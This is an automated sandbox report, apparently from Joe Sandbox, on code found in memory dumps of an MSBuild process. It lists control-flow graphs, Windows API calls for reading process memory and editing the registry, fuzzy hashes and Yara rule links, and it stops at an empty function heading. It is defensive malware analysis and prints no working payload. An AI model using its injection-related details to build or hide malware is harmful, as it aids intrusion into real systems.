                              control_flow_graph 1974 665b5b1-665b5e8 1975 665b5ef-665b696 1974->1975 1976 665b5ea 1974->1976 1980 665b69d-665b6ab 1975->1980 1981 665b698 1975->1981 1976->1975 1982 665b6b2-665b6c5 1980->1982 1983 665b6ad 1980->1983 1981->1980 1984 665b98c-665b995 1982->1984 1983->1982 1985 665b99b-665b9ac 1984->1985 1986 665b6ca-665b6d3 1984->1986 1989 665b9b7-665ba02 1985->1989 1990 665b9ae-665b9b5 1985->1990 1987 665b6d5 1986->1987 1988 665b6da-665b723 LdrInitializeThunk 1986->1988 1987->1988 1994 665b72a-665b75d 1988->1994 1991 665ba04-665ba0d 1989->1991 1990->1991 1998 665b75f-665b774 1994->1998 1999 665b779-665b7bf 1994->1999 2000 665b8ea-665b8ee 1998->2000 2006 665b888-665b891 1999->2006 2001 665b8f0-665b8f9 2000->2001 2002 665b8fa 2000->2002 2001->2002 2002->1984 2007 665b7c4-665b7cd 2006->2007 2008 665b897-665b8bb 2006->2008 2009 665b7d4-665b829 2007->2009 2010 665b7cf 2007->2010 2012 665b8c7 2008->2012 2013 665b8bd-665b8c6 2008->2013 2017 665b82b-665b859 2009->2017 2018 665b85a-665b875 2009->2018 2010->2009 2012->2000 2013->2012 2017->2018 2021 665b877-665b880 2018->2021 2022 665b881 2018->2022 2021->2022 2022->2006
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3861565837.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6650000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: bb977c3ff26e2d34ad603049feec67e8f687e8e781a8ce38d1058882ff88e0ac
                              • Instruction ID: cac6f2a9c00228840dbd7e6561865090e825d2e2af9207719909a70aa7acc6dd
                              • Opcode Fuzzy Hash: bb977c3ff26e2d34ad603049feec67e8f687e8e781a8ce38d1058882ff88e0ac
                              • Instruction Fuzzy Hash: 0FC1E274E01218CFDB54DFAAC854A9DFBF2BF89300F209169D809AB354DB349985CF44
                              Function 05E55A90 Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2190 5e55a90-5e55acf 2310 5e55ad1 call 665f4b1 2190->2310 2311 5e55ad1 call 665f4c0 2190->2311 2192 5e55ad6-5e55ad8 2193 5e55b08-5e55b0c 2192->2193 2194 5e55ada-5e55b05 call 5e52c88 * 2 2192->2194 2196 5e55b12-5e55b22 2193->2196 2197 5e5603c-5e5606d call 5e52c28 2193->2197 2196->2197 2204 5e55b28-5e55b48 call 5e52bf0 2196->2204 2211 5e55e35-5e55e44 2204->2211 2212 5e55b4e-5e55b5a 2204->2212 2216 5e55ec6-5e55ed0 2211->2216 2217 5e55e4a-5e55e54 2211->2217 2212->2211 2215 5e55b60-5e55b69 2212->2215 2215->2211 2223 5e55b6f-5e55b73 2215->2223 2221 5e55ed2-5e55ee7 2216->2221 2222 5e55eec-5e55ef6 2216->2222 2217->2216 2224 5e55e56-5e55e77 2217->2224 2221->2197 2234 5e55efc-5e55f0d 2222->2234 2235 5e55faa-5e56031 2222->2235 2225 5e55b75-5e55b79 2223->2225 2226 5e55b81-5e55b85 2223->2226 2241 5e55e82 2224->2241 2242 5e55e79-5e55e80 2224->2242 2229 5e55b95-5e55c8b 2225->2229 2230 5e55b7b-5e55b7f 2225->2230 2231 5e55cc3-5e55cc7 2226->2231 2232 5e55b8b-5e55b8f 2226->2232 2302 5e55c8d-5e55c90 2229->2302 2303 5e55c99-5e55cc0 call 5e52c28 2229->2303 2230->2226 2230->2229 2231->2211 2236 5e55ccd-5e55cd4 2231->2236 2232->2229 2232->2231 2234->2235 2247 5e55f13-5e55fa5 2234->2247 2235->2197 2236->2211 2237 5e55cda-5e55ce8 2236->2237 2249 5e55cfe-5e55d46 2237->2249 2250 5e55cea-5e55cf8 2237->2250 2246 5e55e89-5e55ec1 2241->2246 2242->2246 2246->2197 2247->2197 2266 5e55d53-5e55d59 2249->2266 2267 5e55d48-5e55d51 2249->2267 2250->2211 2250->2249 2269 5e55d5c-5e55dfd 2266->2269 2267->2269 2304 5e55dff-5e55e02 2269->2304 2305 5e55e0b-5e55e32 call 5e52c28 2269->2305 2302->2303 2304->2305 2310->2192 2311->2192
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: %
                              • API String ID: 0-2567322570
                              • Opcode ID: d2997f358ad3e540aea63fe2ce99db85c9d5fcad6a77f0b3cd07bd471f6a7760
                              • Instruction ID: 09d9a96fe24d6ec85ac7beb2a9e49338c8ef4cc1682fecd72297e8f623ce169a
                              • Opcode Fuzzy Hash: d2997f358ad3e540aea63fe2ce99db85c9d5fcad6a77f0b3cd07bd471f6a7760
                              • Instruction Fuzzy Hash: AB024970A003098FEB58EFA4C844AAEBBF2FF88314F148569D9169B395DB35D906CF50
                              Function 0128C748 Relevance: 1.6, APIs: 1, Instructions: 111nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,?,?), ref: 0128C813
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: Memory64ReadVirtualWow64
                              • String ID:
                              • API String ID: 3357887247-0
                              • Opcode ID: 71f87e1f15417a6e72c1167d4a0838a2a762e11a535736fe9feb6b457dde4004
                              • Instruction ID: 487d0f8f3b2954c23a308dca0fe0acd3516acb0e6146c2d1ee5cb78fce186eb6
                              • Opcode Fuzzy Hash: 71f87e1f15417a6e72c1167d4a0838a2a762e11a535736fe9feb6b457dde4004
                              • Instruction Fuzzy Hash: B04174B9D112589FCF00DFA9D980ADEFBB1BB49310F20902AE918BB310D375A955CF64
                              Function 0128C750 Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,?,?), ref: 0128C813
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: Memory64ReadVirtualWow64
                              • String ID:
                              • API String ID: 3357887247-0
                              • Opcode ID: 2c9d6119e618221f62c7875217ce35a215842f70c493ef24bef481af16456c54
                              • Instruction ID: ce8c4e1ad58873c663a461abf447a289131f76d053d86bb05ca9231d40eafa53
                              • Opcode Fuzzy Hash: 2c9d6119e618221f62c7875217ce35a215842f70c493ef24bef481af16456c54
                              • Instruction Fuzzy Hash: AA4164B9D112589FDF00CFA9D984ADEFBB1BB49310F20902AE918BB310D375A955CF64
                              Function 0128C55A Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWow64QueryInformationProcess64.NTDLL(?,?,?,?,?), ref: 0128C614
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: InformationProcess64QueryWow64
                              • String ID:
                              • API String ID: 1933981353-0
                              • Opcode ID: 82976f367bfd6b63d8bdb050b4128af64c8eb66ca0c3679529914eb9287c8374
                              • Instruction ID: 8e2721f052528ed747baa68796348ea7c276eca92763376a09783365f0660ba8
                              • Opcode Fuzzy Hash: 82976f367bfd6b63d8bdb050b4128af64c8eb66ca0c3679529914eb9287c8374
                              • Instruction Fuzzy Hash: 554166B9D012589FCB00CFA9D984ADEFBB1FB49310F14902AE918B7310D375A905CF68
                              Function 0128C560 Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWow64QueryInformationProcess64.NTDLL(?,?,?,?,?), ref: 0128C614
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: InformationProcess64QueryWow64
                              • String ID:
                              • API String ID: 1933981353-0
                              • Opcode ID: bdb20fb47070af040977b5a0663ced7a6038365af770440f48e9c35f513cc5dc
                              • Instruction ID: e80979305d03b4244ba327e3f3bbe85e9240111965ded4988c6975cd1461265b
                              • Opcode Fuzzy Hash: bdb20fb47070af040977b5a0663ced7a6038365af770440f48e9c35f513cc5dc
                              • Instruction Fuzzy Hash: D94146B9D012589FCB00CFA9D984ADEFBB1BB49310F14902AE918B7310D375A955CF68
                              Function 05E53AA0 Relevance: .5, Instructions: 458COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0e6d62fee38dd2cefba1f0954bd0a772e72ab82c4ff761b1605e8917bd841cac
                              • Instruction ID: 13b99c8263737b731d2eb9da7c9e7b5a4868c369c27f5b845d17f4ef18914836
                              • Opcode Fuzzy Hash: 0e6d62fee38dd2cefba1f0954bd0a772e72ab82c4ff761b1605e8917bd841cac
                              • Instruction Fuzzy Hash: 2D024974A002099FDB15DFA8C884AAEBBF2FF88320F148569E91ADB355DB35DC45CB50
                              Function 05E51410 Relevance: .4, Instructions: 401COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f6603e965604860ecdbd442280f0700b36df75286f0339431c185db8a96ffd3f
                              • Instruction ID: 646b60568bdeddd8a04091ee6deba98c15ec1515d8cdccc17850fa1998e58267
                              • Opcode Fuzzy Hash: f6603e965604860ecdbd442280f0700b36df75286f0339431c185db8a96ffd3f
                              • Instruction Fuzzy Hash: EFF13B34A00209DFDB08EFA8D854AAEBBF3FF88314F148469E846AB355DB35D945CB50
                              Function 05E5AE50 Relevance: 3.3, Instructions: 3289COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 539 5e5ae50-5e5ae5c 540 5e5ae60-5e5ae66 539->540 541 5e5ae5e 539->541 542 5e5ae97-5e5af18 540->542 543 5e5ae68-5e5ae6d 540->543 541->540 554 5e5af6f-5e5af91 542->554 555 5e5af1a-5e5af5f 542->555 544 5e5ae86-5e5ae8c 543->544 545 5e5ae6f-5e5ae74 543->545 544->542 547 5e5ae8e-5e5ae96 544->547 1240 5e5ae76 call 5e5ae40 545->1240 1241 5e5ae76 call 5e5ae50 545->1241 548 5e5ae7c-5e5ae7f 548->544 558 5e5af95-5e5afac 554->558 559 5e5af93 554->559 1238 5e5af61 call 5e5e7c8 555->1238 1239 5e5af61 call 5e5e7b8 555->1239 563 5e5afae-5e5afb8 558->563 564 5e5afb9-5e5b14d 558->564 559->558 588 5e5b153-5e5b17c 564->588 589 5e5e72a-5e5e748 564->589 566 5e5af67-5e5af6e 592 5e5b184-5e5b1ad 588->592 592->589 595 5e5b1b3-5e5df52 592->595 595->589 1146 5e5df58-5e5dfc7 595->1146 1146->589 1151 5e5dfcd-5e5e03c 1146->1151 1151->589 1156 5e5e042-5e5e5bb 1151->1156 1156->589 1221 5e5e5c1-5e5e729 1156->1221 1238->566 1239->566 1240->548 1241->548
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0259ce3b9c3c5aec91463dbaf4d1094b4d50e582c19c2a6d4291935a36db3cc3
                              • Instruction ID: c3b97195d98efda6cdeab9ab048ce0a2981a02004a32dc894456eb8c48980bdf
                              • Opcode Fuzzy Hash: 0259ce3b9c3c5aec91463dbaf4d1094b4d50e582c19c2a6d4291935a36db3cc3
                              • Instruction Fuzzy Hash: 66635E74A5021D9FEB259BA0CC55BEEBBB2FB48710F1080D9E6093B2D5CE795E809F44
                              Function 05E5F0F8 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1242 5e5f0f8-5e5f157 1248 5e5f2f5-5e5f332 1242->1248 1249 5e5f15d-5e5f160 1242->1249 1262 5e5f334-5e5f34b 1248->1262 1263 5e5f34c-5e5f351 1248->1263 1250 5e5f166-5e5f1c1 1249->1250 1251 5e5f20c-5e5f229 1249->1251 1274 5e5f1e5-5e5f1fe 1250->1274 1275 5e5f1c3-5e5f1e3 call 5e56dd0 1250->1275 1256 5e5f22e-5e5f266 1251->1256 1272 5e5f2b2-5e5f2cb 1256->1272 1273 5e5f268-5e5f28c 1256->1273 1280 5e5f2d6 1272->1280 1281 5e5f2cd 1272->1281 1290 5e5f295 1273->1290 1291 5e5f28e-5e5f293 1273->1291 1278 5e5f200 1274->1278 1279 5e5f209-5e5f20a 1274->1279 1275->1274 1278->1279 1279->1251 1280->1248 1281->1280 1292 5e5f29a-5e5f2b0 call 5e56dd0 1290->1292 1291->1292 1292->1272 1292->1273
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;U$kh*m^
                              • API String ID: 0-981172662
                              • Opcode ID: c50821a8c80dda439f2d83b70e6e7ec0c0eadc869dcc133b26c37fa3296271c9
                              • Instruction ID: d374682cc432001d6ad0e7dc1e270e6292e9150e8f19df7c30967964ac49c2d2
                              • Opcode Fuzzy Hash: c50821a8c80dda439f2d83b70e6e7ec0c0eadc869dcc133b26c37fa3296271c9
                              • Instruction Fuzzy Hash: B6615C78700209CFDB14DFA4D558AAEBBF6FF88224F109469E946DB365DB319C41CB90
                              Function 0665C218 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1787 665c218-665c270 call 665be10 1793 665c276-665c27a 1787->1793 1794 665c272-665c274 1787->1794 1795 665c280-665c2a3 1793->1795 1794->1795 1800 665c2a5-665c2aa 1795->1800 1801 665c2af-665c2bb 1795->1801 1802 665c38b-665c391 1800->1802 1806 665c2bd-665c2e9 call 665af78 1801->1806 1807 665c2ee-665c2fa 1801->1807 1804 665c397-665c3b7 1802->1804 1805 665c393 1802->1805 1818 665c3c3-665c3d8 1804->1818 1819 665c3b9-665c3be 1804->1819 1805->1804 1806->1802 1811 665c306-665c31a 1807->1811 1812 665c2fc-665c301 1807->1812 1823 665c386 1811->1823 1824 665c31c-665c33e 1811->1824 1812->1802 1832 665c3de-665c3ee 1818->1832 1833 665c45b 1818->1833 1822 665c460-665c46e 1819->1822 1828 665c486-665c492 1822->1828 1829 665c470-665c474 1822->1829 1823->1802 1845 665c364-665c37d 1824->1845 1846 665c340-665c362 1824->1846 1837 665c576-665c5aa 1828->1837 1838 665c498-665c4b4 1828->1838 1969 665c476 call 665cc71 1829->1969 1970 665c476 call 665cc80 1829->1970 1971 665c476 call 665cd40 1829->1971 1972 665c476 call 665cea8 1829->1972 1973 665c476 call 665ceb8 1829->1973 1841 665c3f0-665c400 1832->1841 1842 665c402-665c407 1832->1842 1833->1822 1834 665c47c-665c47e 1834->1828 1861 665c5c2-665c5c4 1837->1861 1862 665c5ac-665c5c0 1837->1862 1853 665c562-665c570 1838->1853 1841->1842 1848 665c409-665c419 1841->1848 1842->1822 1845->1823 1863 665c37f-665c384 1845->1863 1846->1823 1846->1845 1859 665c422-665c432 1848->1859 1860 665c41b-665c420 1848->1860 1853->1837 1855 665c4b9-665c4c2 1853->1855 1864 665c781-665c7a8 1855->1864 1865 665c4c8-665c4db 1855->1865 1876 665c434-665c439 1859->1876 1877 665c43b-665c44b 1859->1877 1860->1822 1868 665c5f4-665c634 1861->1868 1869 665c5c6-665c5d8 1861->1869 1862->1861 1863->1802 1878 665c83c-665c870 1864->1878 1879 665c7ae-665c7b0 1864->1879 1865->1864 1866 665c4e1-665c4f3 1865->1866 1881 665c4f5-665c501 1866->1881 1882 665c55f 1866->1882 1967 665c636 call 665d078 1868->1967 1968 665c636 call 665d088 1868->1968 1869->1868 1880 665c5da-665c5e2 1869->1880 1876->1822 1891 665c454-665c459 1877->1891 1892 665c44d-665c452 1877->1892 1918 665c872-665c89b 1878->1918 1919 665c89d-665c8a2 1878->1919 1879->1878 1883 665c7b6-665c7b8 1879->1883 1890 665c5ea-665c5ec 1880->1890 1881->1864 1886 665c507-665c55c 1881->1886 1882->1853 1883->1878 1889 665c7be-665c7c2 1883->1889 1886->1882 1889->1878 1893 665c7c4-665c7c8 1889->1893 1890->1868 1891->1822 1892->1822 1897 665c7da-665c81c call 6656218 1893->1897 1898 665c7ca-665c7d8 1893->1898 1896 665c63c-665c650 1910 665c697-665c6e4 RegQueryValueA 1896->1910 1911 665c652-665c669 1896->1911 1905 665c824-665c839 1897->1905 1898->1905 1932 665c6e6-665c6ff 1910->1932 1933 665c738-665c74f 1910->1933 1926 665c677-665c68f call 665af78 1911->1926 1927 665c66b-665c675 1911->1927 1918->1919 1921 665c8a4 1919->1921 1922 665c8a9-665c920 LdrInitializeThunk 1919->1922 1921->1922 1929 665ca04-665ca0d 1922->1929 1926->1910 1927->1926 1935 665c925-665c92e 1929->1935 1936 665ca13-665ca2f 1929->1936 1947 665c701 1932->1947 1948 665c709-665c735 1932->1948 1944 665c775-665c77e 1933->1944 1945 665c751-665c75a 1933->1945 1938 665c935-665c959 1935->1938 1939 665c930 1935->1939 1949 665ca31-665ca72 1936->1949 1950 665ca73-665ca7a 1936->1950 1951 665c9a3-665ca01 1938->1951 1952 665c95b-665c9a2 1938->1952 1939->1938 1953 665c763-665c76c 1945->1953 1947->1948 1948->1933 1949->1950 1951->1929 1952->1951 1953->1944 1967->1896 1968->1896 1969->1834 1970->1834 1971->1834 1972->1834 1973->1834
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3861565837.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6650000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 80ad6cc4d7baeeff81190bd0e47a0e172fae53438c1abe75f9f343873d778822
                              • Instruction ID: 294399bc2fabea809464ad6bd98cfe399125c60cbdaf608cbd50c158f65aad98
                              • Opcode Fuzzy Hash: 80ad6cc4d7baeeff81190bd0e47a0e172fae53438c1abe75f9f343873d778822
                              • Instruction Fuzzy Hash: DEB12734B006048FCB55DF39C588A6ABBF2FF99604B1680ACE946DB3A1DB34EC05CB51
                              Function 05DE2C80 Relevance: 1.8, APIs: 1, Instructions: 267COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2025 5de2c80-5de2cb2 2026 5de2cf8 2025->2026 2027 5de2cb4-5de2cbb 2025->2027 2028 5de2cfb-5de2d37 2026->2028 2029 5de2ccc 2027->2029 2030 5de2cbd-5de2cca 2027->2030 2036 5de2dad-5de2db8 2028->2036 2037 5de2d39-5de2d42 2028->2037 2031 5de2cce-5de2cd0 2029->2031 2030->2031 2034 5de2cd7-5de2cd9 2031->2034 2035 5de2cd2-5de2cd5 2031->2035 2039 5de2cea 2034->2039 2040 5de2cdb-5de2ce8 2034->2040 2038 5de2cf6 2035->2038 2041 5de2dba-5de2dbd 2036->2041 2042 5de2dc7-5de2de9 2036->2042 2037->2036 2043 5de2d44-5de2d4a 2037->2043 2038->2028 2044 5de2cec-5de2cee 2039->2044 2040->2044 2041->2042 2052 5de2def-5de2df8 2042->2052 2053 5de2ea4-5de2ede 2042->2053 2045 5de2fa4-5de2fb0 2043->2045 2046 5de2d50-5de2d5d 2043->2046 2044->2038 2054 5de2f8e-5de2f90 2045->2054 2055 5de2fb2-5de2fb8 2045->2055 2049 5de2d5f-5de2d83 2046->2049 2050 5de2da4-5de2dab 2046->2050 2065 5de2d85-5de2d88 2049->2065 2066 5de2da0 2049->2066 2050->2036 2050->2043 2052->2045 2056 5de2dfe-5de2e2d 2052->2056 2078 5de2ee8-5de2eee 2053->2078 2059 5de2f96-5de2fa1 2054->2059 2058 5de2fba-5de2fca 2055->2058 2055->2059 2072 5de2e2f-5de2e45 2056->2072 2073 5de2e47-5de2e5a 2056->2073 2061 5de2fcf-5de2fec LookupPrivilegeDisplayNameW 2058->2061 2070 5de2d8a-5de2d8d 2065->2070 2071 5de2d94-5de2d9d 2065->2071 2066->2050 2070->2071 2074 5de2e5c-5de2e63 2072->2074 2073->2074 2076 5de2e88 2074->2076 2077 5de2e65-5de2e76 2074->2077 2076->2053 2077->2076 2081 5de2e78-5de2e81 2077->2081 2080 5de2ef5-5de2f1c 2078->2080 2084 5de2f1e-5de2f34 2080->2084 2085 5de2f36-5de2f49 2080->2085 2081->2076 2086 5de2f4b-5de2f52 2084->2086 2085->2086 2087 5de2f54-5de2f5a 2086->2087 2088 5de2f61 2086->2088 2087->2088 2088->2054
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3857740782.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5de0000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e7081d80bfc9e84b054a1c529705a971b56a4d6c09a07de181cf927f53d6295f
                              • Instruction ID: 4a04eb95e10a0df48b09cc337de9f1236f23e36cef16cd133bfcceb61eb7e7ba
                              • Opcode Fuzzy Hash: e7081d80bfc9e84b054a1c529705a971b56a4d6c09a07de181cf927f53d6295f
                              • Instruction Fuzzy Hash: 9EB12679A012099FDB15DFA8D484A9DFBF6BF88310F24C15AE805AB361CB70ED45CB90
                              Function 0665AF67 Relevance: 1.7, APIs: 1, Instructions: 180COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2312 665af67-665af8a 2437 665af8c call 665bc45 2312->2437 2438 665af8c call 665ba28 2312->2438 2439 665af8c call 665ba18 2312->2439 2314 665af92-665afac 2316 665afae-665afb7 2314->2316 2317 665afba-665afcd 2314->2317 2316->2317 2318 665afd3-665afd6 2317->2318 2319 665b23d-665b241 2317->2319 2323 665afe5-665aff1 2318->2323 2324 665afd8-665afdd 2318->2324 2320 665b256-665b260 2319->2320 2321 665b243-665b253 2319->2321 2321->2320 2325 665aff7-665b009 2323->2325 2326 665b27b-665b2c0 2323->2326 2324->2323 2332 665b175-665b183 2325->2332 2333 665b00f-665b013 2325->2333 2330 665b2c7-665b320 2326->2330 2331 665b2c2 2326->2331 2426 665b322 call 665b885 2330->2426 2427 665b322 call 665b5b1 2330->2427 2428 665b322 call 665b8e1 2330->2428 2429 665b322 call 665b950 2330->2429 2430 665b322 call 665b8cc 2330->2430 2431 665b322 call 665b97f 2330->2431 2432 665b322 call 665b8ae 2330->2432 2433 665b322 call 665b94e 2330->2433 2434 665b322 call 665b959 2330->2434 2331->2330 2339 665b189-665b197 2332->2339 2340 665b208-665b20a 2332->2340 2435 665b015 call 665be01 2333->2435 2436 665b015 call 665be10 2333->2436 2334 665b328-665b342 2337 665b344-665b346 2334->2337 2338 665b34b-665b42c 2334->2338 2335 665b01b-665b062 2362 665b064-665b070 call 665acb8 2335->2362 2363 665b072 2335->2363 2341 665b5a0-665b5a7 2337->2341 2397 665b4c2-665b4cb 2338->2397 2343 665b1a6-665b1b2 2339->2343 2344 665b199-665b19e 2339->2344 2345 665b20c-665b212 2340->2345 2346 665b218-665b224 2340->2346 2343->2326 2350 665b1b8-665b1e7 2343->2350 2344->2343 2348 665b214 2345->2348 2349 665b216 2345->2349 2354 665b226-665b237 2346->2354 2348->2346 2349->2346 2365 665b1e9-665b1f6 2350->2365 2366 665b1f8-665b206 2350->2366 2354->2318 2354->2319 2367 665b074-665b084 2362->2367 2363->2367 2365->2366 2366->2319 2374 665b086-665b09d 2367->2374 2375 665b09f-665b0a1 2367->2375 2374->2375 2376 665b0a3-665b0b1 2375->2376 2377 665b0ea-665b0ec 2375->2377 2376->2377 2387 665b0b3-665b0c5 2376->2387 2379 665b0ee-665b0f8 2377->2379 2380 665b0fa-665b10a 2377->2380 2379->2380 2388 665b143-665b14f 2379->2388 2389 665b135-665b138 2380->2389 2390 665b10c-665b11a 2380->2390 2394 665b0c7-665b0c9 2387->2394 2395 665b0cb-665b0cf 2387->2395 2388->2354 2400 665b155-665b170 RegReplaceKeyA 2388->2400 2440 665b13b call 665c228 2389->2440 2441 665b13b call 665c218 2389->2441 2403 665b12d-665b130 2390->2403 2404 665b11c-665b12b 2390->2404 2393 665b141 2393->2388 2399 665b0d5-665b0e4 2394->2399 2395->2399 2401 665b431-665b43a 2397->2401 2402 665b4d1-665b4fb 2397->2402 2399->2377 2411 665b261-665b274 2399->2411 2400->2319 2405 665b441-665b4bf 2401->2405 2406 665b43c 2401->2406 2412 665b591-665b59a 2402->2412 2403->2319 2404->2388 2405->2397 2406->2405 2411->2326 2412->2341 2414 665b500-665b509 2412->2414 2416 665b510-665b58e 2414->2416 2417 665b50b 2414->2417 2416->2412 2417->2416 2426->2334 2427->2334 2428->2334 2429->2334 2430->2334 2431->2334 2432->2334 2433->2334 2434->2334 2435->2335 2436->2335 2437->2314 2438->2314 2439->2314 2440->2393 2441->2393
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3861565837.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6650000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3975735d63ff907b14a6e9efc55054cb33b543852051a3c515cba5f9f055592d
                              • Instruction ID: 50921b14f41d47ced8420017fc37b80cb24ce68ff131b309b020e98fab69fe19
                              • Opcode Fuzzy Hash: 3975735d63ff907b14a6e9efc55054cb33b543852051a3c515cba5f9f055592d
                              • Instruction Fuzzy Hash: 81616E30F006198FDB94DF69C965A6EBBF6EF88610F158169D906EB364DB34DC01CBA0
                              Function 0128E78A Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2569 128e78a-128e791 2570 128e7ca 2569->2570 2571 128e793-128e7c2 2569->2571 2572 128e7cb-128e7cf 2570->2572 2573 128e825-128e878 2570->2573 2571->2570 2575 128e880-128e8ff RtlCreateHeap 2573->2575 2576 128e908-128e94c 2575->2576 2577 128e901-128e907 2575->2577 2577->2576
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 04f58ad9575117e6bf0fd9ab5fb23996d7b6e8534bf83a034f798992e895aabd
                              • Instruction ID: 71436788ad63f77d02a12db611c99d9d539eb49d93d60f0e46bd6f9d23b052de
                              • Opcode Fuzzy Hash: 04f58ad9575117e6bf0fd9ab5fb23996d7b6e8534bf83a034f798992e895aabd
                              • Instruction Fuzzy Hash: C941DCB9E052599FDB00CFA9E980A9EFBF1FF49310F14902AE818B7350D334A905CB64
                              Function 05E1E11E Relevance: 1.6, APIs: 1, Instructions: 130comclipboardCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
